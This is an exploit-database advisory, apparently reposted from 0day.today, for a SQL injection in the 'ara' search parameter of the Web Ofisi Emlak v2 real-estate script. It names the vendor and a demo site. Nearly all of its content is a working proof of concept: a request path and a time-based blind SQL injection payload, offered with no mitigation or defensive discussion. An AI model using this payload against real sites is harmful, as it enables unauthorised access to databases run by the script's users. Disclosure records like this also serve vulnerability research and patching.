id: 33008
date: 07/19/2019
title: Web Ofisi Emlak 2 - (ara) SQL Injection Vulnerability
author: Ahmet Ümit BAYRAM
cves: 

# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
# Demo Site: http://demobul.net/emlakv2/
# Version: v2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/ara.html?ara=
Vulnerable Parameter: ara (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

#  0day.today [2023-03-26]  #